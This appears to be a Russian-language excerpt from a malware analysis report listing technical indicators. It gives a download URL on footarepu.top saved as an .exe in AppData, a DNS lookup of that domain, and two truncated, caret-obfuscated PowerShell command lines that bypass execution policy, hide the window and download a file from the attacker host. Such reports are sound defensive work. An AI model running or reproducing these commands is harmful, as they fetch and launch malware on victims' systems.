Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^wEr^s^H^ELl^.^exE^ ^-^Exe^cU^TIONPOlIcY BYPA^Ss -nO^pRoFiLe -^WIN^D^ow^ST^yLE h^ID^dE^N (nEw-^o^Bj^Ec^t^ SYS^Tem^.NEt.we^BcLi^eN^t)^.DowNlOADFi^lE('http://footarepu.top/r...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "P^O^wEr^s^H^ELl^.^exE^ ^-^Exe^cU^TIONPOlIcY BYPA^Ss -nO^pRoFiLe -^WIN^D^ow^ST^yLE h^ID^dE^N (nEw-^o^Bj^Ec^t^ SYS^Tem^.NEt.we^BcLi^eN^t)^.DowNlOADFi^lE('http://footarepu.top/r...' (со скрытым окном)